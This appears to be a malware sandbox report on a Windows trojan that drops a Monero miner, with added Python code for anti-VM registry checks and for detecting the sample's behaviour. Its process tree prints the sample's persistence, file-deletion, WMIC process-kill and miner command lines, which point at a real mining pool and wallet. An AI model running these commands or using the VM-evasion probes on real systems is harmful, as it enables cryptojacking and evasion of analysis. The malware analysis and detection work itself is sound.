Analysis

  • max time kernel
    72s
  • max time network
    118s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    21/03/2022, 20:22

General

  • Target

    SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe

  • Size

    7.7MB

  • MD5

    7bf3a72a5287c6388cda810822c894a3

  • SHA1

    4c23e414457d18ceee367a19afbe0c51588c3df0

  • SHA256

    7ae4237b70f7233f779dbcde9db944e13472a1c4097baa4a17f5e769e0869476

  • SHA512

    014fa7d7ead618cdbead06ec8658b7c41baba40d1954358065b28f0eab824028a4b34263d187ed332a0e40b5e6bba64b027bf6cfadf638b0924ae96aba00d9c9

Malware Config

Signatures

  • Gozi, Gozi ISFB

    Gozi ISFB is a well-known and widely distributed banking trojan. Note that nothing in the process tree below matches banking-trojan behaviour: the dropped HxTsr.exe is launched with the XMRig miner's option syntax (-o pool:port, -u wallet, --randomx-cache-qos) against a Monero mining pool, so this family match should be treated as a probable false positive of the signature rather than as the sample's classification.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Executes dropped EXE 5 IoCs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 8 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The sandbox labels this as likely ransomware behaviour, but it is also a routine hardware-fingerprinting step; nothing else in this report points to file encryption.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with WMI 2 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs
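Added example, not from the sandbox report or from the sample: the registry locations behind the "Checks BIOS information in registry", "Identifies VirtualBox via ACPI registry values" and "Checks SCSI registry key(s)" signatures above, and the vendor-string matching such anti-VM checks apply to them, written in Python. `classify_values` is pure and runs on any OS; `collect_values` reads the live registry and only works on Windows. The probe list and the marker regex are my choices, and the two sample value sets are constructed, not captured from this analysis.

```python
import re

# Registry locations that sandbox-evasion code reads to recognise a VM. These are
# real Windows paths; the page does not show which of them this sample queried.
VM_REGISTRY_PROBES = [
    (r"HARDWARE\DESCRIPTION\System\BIOS", "SystemManufacturer"),
    (r"HARDWARE\DESCRIPTION\System\BIOS", "SystemProductName"),
    (r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"),
    (r"HARDWARE\DESCRIPTION\System", "VideoBiosVersion"),
    (r"HARDWARE\ACPI\DSDT", None),   # None: inspect subkey names (VBOX__ on VirtualBox)
    (r"HARDWARE\ACPI\FADT", None),
    (r"HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0", "Identifier"),
]
SCSI_LUN0 = VM_REGISTRY_PROBES[6][0]

# Vendor strings of the common hypervisors; case-insensitive substring match.
# "virtual" is deliberately broad (Hyper-V reports "Virtual Machine"), so expect
# it to fire on cloud hosts too.
VM_MARKERS = re.compile(r"vbox|virtualbox|innotek|vmware|qemu|bochs|parallels|xen|kvm|hyper-v|virtual", re.I)


def classify_values(values):
    """values maps (key_path, value_name) -> str or list of str (REG_MULTI_SZ).
    Returns one (key_path, value_name, matched_text) tuple per value that names a VM."""
    hits = []
    for (path, name), data in values.items():
        text = data if isinstance(data, str) else " ".join(str(d) for d in data)
        m = VM_MARKERS.search(text)
        if m:
            hits.append((path, name, m.group(0)))
    return hits


def collect_values():
    """Windows only: read every probe above from HKLM into the dict classify_values expects."""
    import winreg  # standard library, Windows only
    values = {}
    for path, name in VM_REGISTRY_PROBES:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
                if name is None:
                    names, i = [], 0
                    while True:
                        try:
                            names.append(winreg.EnumKey(key, i))
                            i += 1
                        except OSError:
                            break
                    values[(path, "<subkeys>")] = " ".join(names)
                else:
                    values[(path, name)] = winreg.QueryValueEx(key, name)[0]
        except OSError:
            continue  # key or value absent on this machine
    return values


# Constructed samples (not captured from this analysis): a stock VirtualBox guest,
# whose default strings are well known, and a physical laptop.
SAMPLE_VBOX = {
    (r"HARDWARE\DESCRIPTION\System\BIOS", "SystemManufacturer"): "innotek GmbH",
    (r"HARDWARE\DESCRIPTION\System\BIOS", "SystemProductName"): "VirtualBox",
    (r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"): ["VBOX   - 1"],
    (r"HARDWARE\ACPI\DSDT", "<subkeys>"): "VBOX__",
    (SCSI_LUN0, "Identifier"): "VBOX HARDDISK",
}
SAMPLE_PHYSICAL = {
    (r"HARDWARE\DESCRIPTION\System\BIOS", "SystemManufacturer"): "Dell Inc.",
    (r"HARDWARE\DESCRIPTION\System\BIOS", "SystemProductName"): "Latitude 7420",
    (r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"): ["DELL   - 1072009", "1.18.0"],
    (r"HARDWARE\ACPI\DSDT", "<subkeys>"): "DELL__",
    (SCSI_LUN0, "Identifier"): "NVMe    PC SN730 NVMe WDC 512GB",
}

if __name__ == "__main__":
    import sys
    values = collect_values() if sys.platform == "win32" else SAMPLE_VBOX
    for path, name, marker in classify_values(values):
        print("VM marker %r in HKLM\\%s\\%s" % (marker, path, name))
```

Run on a sandbox guest this prints one line per value that gives the VM away; every one of those values is something an analysis environment can rewrite (VirtualBox exposes them through VBoxManage setextradata) to defeat exactly the checks this report flags.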

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1380
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1460
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "WmіPrvSE" /tr "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exe" /f
        3⤵
        • Creates scheduled task(s)
        PID:2496
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "RuntіmeBroker" /tr "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntіmeBroker.exe" /f
        3⤵
        • Creates scheduled task(s)
        PID:2660
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /C ping -n 1 127.0.0.1 & xcopy /h /r /y /z /c /i "WmіPrvSE.exe" "%userprofile%\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\" & ping -n 4 127.0.0.1 & erase %temp% /s /f /q
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3304
        • C:\Windows\system32\PING.EXE
          ping -n 1 127.0.0.1
          4⤵
          • Runs ping.exe
          PID:4032
        • C:\Windows\system32\xcopy.exe
          xcopy /h /r /y /z /c /i "WmіPrvSE.exe" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\"
          4⤵
            PID:4592
          • C:\Windows\system32\PING.EXE
            ping -n 4 127.0.0.1
            4⤵
            • Runs ping.exe
            PID:2300
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /C ping -n 1 127.0.0.1 & xcopy /h /r /y /z /c /i "RuntіmeBroker.exe" "%userprofile%\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3128
          • C:\Windows\system32\PING.EXE
            ping -n 1 127.0.0.1
            4⤵
            • Runs ping.exe
            PID:4088
          • C:\Windows\system32\xcopy.exe
            xcopy /h /r /y /z /c /i "RuntіmeBroker.exe" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\"
            4⤵
              PID:4016
      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exe
        C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exe
        1⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Checks whether UAC is enabled
        • Drops file in System32 directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4720
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /C erase %temp% /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' call terminate
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1408
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' call terminate
            3⤵
            • Kills process with WMI
            PID:1396
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' delete
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3468
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' delete
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3492
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /C ping -n 2 127.0.0.1>%temp%\log2 && rd /s /q %appdata%\Sysfiles & rd /s /q %temp%
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:424
          • C:\Windows\system32\PING.EXE
            ping -n 2 127.0.0.1
            3⤵
            • Runs ping.exe
            PID:2164
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /C erase %temp% /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' delete
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3964
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' delete
            3⤵
              PID:3032
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & ping -n 10 127.0.0.1>%temp%\log1 && erase %temp% /s /f /q & rd /s /q %appdata%\Sysfiles
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4040
            • C:\Windows\system32\PING.EXE
              ping -n 10 127.0.0.1
              3⤵
              • Runs ping.exe
              PID:1460
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' call terminate
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2360
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' call terminate
              3⤵
              • Kills process with WMI
              • Suspicious use of AdjustPrivilegeToken
              PID:1656
          • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe
            "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe" -o gulf.moneroocean.stream:20128 -u 46vJx3eY8qKgUN5cPxr81MjnNASPRxpp7fDKWXPYp93Fj6zhGPRLR7BM6FNQNGgTK6R5Pz3V55bvn5jLMmu6VWuJQcMk3ZL -p x -k -v=0 --cpu-no-yield --randomx-cache-qos --tls -t 1
            2⤵
            • Executes dropped EXE
            • Checks BIOS information in registry
            • Loads dropped DLL
            • Checks whether UAC is enabled
            • Drops file in System32 directory
            • Suspicious use of FindShellTrayWindow
            PID:400
        • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntіmeBroker.exe
          C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntіmeBroker.exe
          1⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3452
          • C:\Windows\System32\cleanmgr.exe
            "C:\Windows\System32\cleanmgr.exe" /setup
            2⤵
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Checks SCSI registry key(s)
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:208
            • C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\dismhost.exe
              C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\dismhost.exe {F243B500-D086-4018-A5D7-26A3B538A770}
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              PID:3708
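Added example, not part of the sandbox report or of the sample: detection logic in Python run over the command lines from the process tree above (copied from the page and embedded as sample events with their PIDs), the way a hunter would apply it to Sysmon event 1 or Security 4688 records. Three things in the tree drive it: the task names spell WmiPrvSE and RuntimeBroker with a Cyrillic і (U+0456) to look like Windows binaries; both tasks fire every minute and point into AppData\Local\Packages\*\LocalState; and HxTsr.exe is started with XMRig miner options against a mining pool, while cmd.exe uses WMIC to terminate other processes. The confusables table (a small subset of Unicode TR39), the list of imitated binary names and the regexes are my assumptions.

```python
import re
import unicodedata

# Cyrillic letters that render like Latin ones (assumption: a small subset of the
# Unicode TR39 confusables table, enough for the task names on this page).
CONFUSABLES = {"\u0456": "i", "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
               "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u0455": "s", "\u0458": "j",
               "\u0410": "A", "\u0412": "B", "\u0415": "E", "\u041a": "K", "\u041c": "M",
               "\u041d": "H", "\u041e": "O", "\u0420": "P", "\u0421": "C", "\u0422": "T"}
# Windows binaries that malware likes to impersonate (assumed list, extend as needed).
KNOWN_WINDOWS_NAMES = {"wmiprvse", "runtimebroker", "svchost", "csrss", "lsass",
                       "explorer", "dllhost", "conhost", "smss", "winlogon"}
# Real XMRig option names; both appear on the HxTsr.exe command line above.
XMRIG_FLAGS = ("--randomx-cache-qos", "--cpu-no-yield")
POOL = re.compile(r"(?:^|\s)-o\s+([\w.-]+):(\d{1,5})\b")
MONERO_ADDR = re.compile(r"(?:^|\s)-u\s+([48][1-9A-HJ-NP-Za-km-z]{94})(?=\s|$)")


def skeleton(name):
    """Replace confusable letters by their Latin look-alikes."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in unicodedata.normalize("NFKC", name))


def homoglyph_masquerade(name):
    """Return the imitated binary name if `name` is a non-ASCII look-alike of one, else None."""
    base = re.sub(r"\.exe$", "", name, flags=re.I)
    if base.isascii():
        return None
    ascii_form = skeleton(base)
    if ascii_form.isascii() and ascii_form.lower() in KNOWN_WINDOWS_NAMES:
        return ascii_form
    return None


def _flag(cmd, name):
    """Value of a schtasks /name argument, quoted or bare; None if absent."""
    m = re.search(r'/%s\s+(?:"([^"]*)"|(\S+))' % name, cmd, re.I)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def suspicious_schtasks(cmd):
    """Reasons a `schtasks /create` command line looks like malware persistence."""
    if not re.search(r'schtasks(?:\.exe)?"?\s+/create\b', cmd, re.I):
        return []
    sc, mo, tn, tr = (_flag(cmd, f) for f in ("sc", "mo", "tn", "tr"))
    reasons = []
    if sc and sc.lower() == "minute" and mo and mo.isdigit() and int(mo) <= 5:
        reasons.append("fires every %s minute(s)" % mo)
    if tr and re.search(r"\\AppData\\Local\\Packages\\[^\\]+\\LocalState\\", tr, re.I):
        reasons.append("target lives under an app package LocalState folder")
    spoof = homoglyph_masquerade(tn) if tn else None
    if spoof:
        reasons.append("task name imitates %s with non-ASCII letters" % spoof)
    return reasons


def wmic_process_kill(cmd):
    """True for `wmic process where ... call terminate` or `... delete`."""
    return bool(re.search(r"\bwmic\b.*\bprocess\b.*\bwhere\b.*\b(?:call\s+terminate|delete)\b",
                          cmd, re.I | re.S))


def miner_indicators(cmd):
    """Pool endpoint, Monero wallet and XMRig-only options found on a command line."""
    found = []
    m = POOL.search(cmd)
    if m:
        found.append("pool %s:%s" % (m.group(1), m.group(2)))
    if MONERO_ADDR.search(cmd):
        found.append("95-char Monero wallet passed as -u")
    tokens = cmd.split()
    found.extend(f for f in XMRIG_FLAGS if f in tokens)
    return found


def scan(events):
    """events: iterable of (pid, command_line). Returns [(pid, finding), ...]."""
    findings = []
    for pid, cmd in events:
        findings += [(pid, "schtasks: " + r) for r in suspicious_schtasks(cmd)]
        if wmic_process_kill(cmd):
            findings.append((pid, "wmic process termination"))
        findings += [(pid, "miner: " + r) for r in miner_indicators(cmd)]
    return findings


# Sample events: command lines copied from the process tree above, with their PIDs.
PKG = (r"C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy"
       r"\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}")
WALLET = "46vJx3eY8qKgUN5cPxr81MjnNASPRxpp7fDKWXPYp93Fj6zhGPRLR7BM6FNQNGgTK6R5Pz3V55bvn5jLMmu6VWuJQcMk3ZL"
SAMPLE_EVENTS = [
    (2496, '"C:\\Windows\\System32\\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Wm\u0456PrvSE" '
           '/tr "%s\\Wm\u0456PrvSE.exe" /f' % PKG),
    (1396, "wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\\\%'' call terminate"),
    (400, '"%s\\HxTsr.exe" -o gulf.moneroocean.stream:20128 -u %s -p x -k -v=0 '
          '--cpu-no-yield --randomx-cache-qos --tls -t 1' % (PKG, WALLET)),
    (208, '"C:\\Windows\\System32\\cleanmgr.exe" /setup'),   # benign child, must stay quiet
]

if __name__ == "__main__":
    for pid, finding in scan(SAMPLE_EVENTS):
        print("PID %-5d %s" % (pid, finding))
```

The homoglyph check is the one worth keeping in production: a task or image name whose ASCII skeleton equals a Windows binary name but whose raw bytes are not ASCII has no legitimate reason to exist, so it can alert with almost no tuning, whereas the one-minute schedule and the LocalState path are strong here but will need allow-listing in environments with noisy packaged apps.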

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/400-222-0x00000000001D0000-0x00000000001F0000-memory.dmp (Filesize 128KB)
  • memory/400-221-0x0000000140000000-0x0000000140E83000-memory.dmp (Filesize 14.5MB)
  • memory/400-220-0x0000000140000000-0x0000000140E83000-memory.dmp (Filesize 14.5MB)
  • memory/400-219-0x00007FFE80030000-0x00007FFE80031000-memory.dmp (Filesize 4KB)
  • memory/400-217-0x00007FFE80000000-0x00007FFE80002000-memory.dmp (Filesize 8KB)
  • memory/400-218-0x0000000002070000-0x00000000020AD000-memory.dmp (Filesize 244KB)
  • memory/400-216-0x00007FFEA05F0000-0x00007FFEA06AE000-memory.dmp (Filesize 760KB)
  • memory/400-215-0x00007FFE9FB00000-0x00007FFE9FDC9000-memory.dmp (Filesize 2.8MB)
  • memory/1460-132-0x0000000000540000-0x000000000054E000-memory.dmp (Filesize 56KB)
  • memory/1460-135-0x00007FFE82B80000-0x00007FFE83641000-memory.dmp (Filesize 10.8MB)
  • memory/3452-139-0x0000000000250000-0x0000000000262000-memory.dmp (Filesize 72KB)
  • memory/3452-140-0x00007FFE824D0000-0x00007FFE82F91000-memory.dmp (Filesize 10.8MB)
  • memory/4720-165-0x000000003F280000-0x000000003FFAA000-memory.dmp (Filesize 13.2MB)
  • memory/4720-214-0x000000001EFE0000-0x000000001EFE2000-memory.dmp (Filesize 8KB)
  • memory/4720-166-0x00007FFE824D0000-0x00007FFE82F91000-memory.dmp (Filesize 10.8MB)
  • memory/4720-151-0x00007FFE80030000-0x00007FFE80031000-memory.dmp (Filesize 4KB)
  • memory/4720-150-0x00007FFE80000000-0x00007FFE80002000-memory.dmp (Filesize 8KB)
  • memory/4720-149-0x00007FFEA05F0000-0x00007FFEA06AE000-memory.dmp (Filesize 760KB)
  • memory/4720-141-0x00007FFE9FB00000-0x00007FFE9FDC9000-memory.dmp (Filesize 2.8MB)
  • memory/4720-143-0x0000000180000000-0x0000000180046000-memory.dmp (Filesize 280KB)
  • memory/4720-148-0x00007FFE9FB00000-0x00007FFE9FDC9000-memory.dmp (Filesize 2.8MB)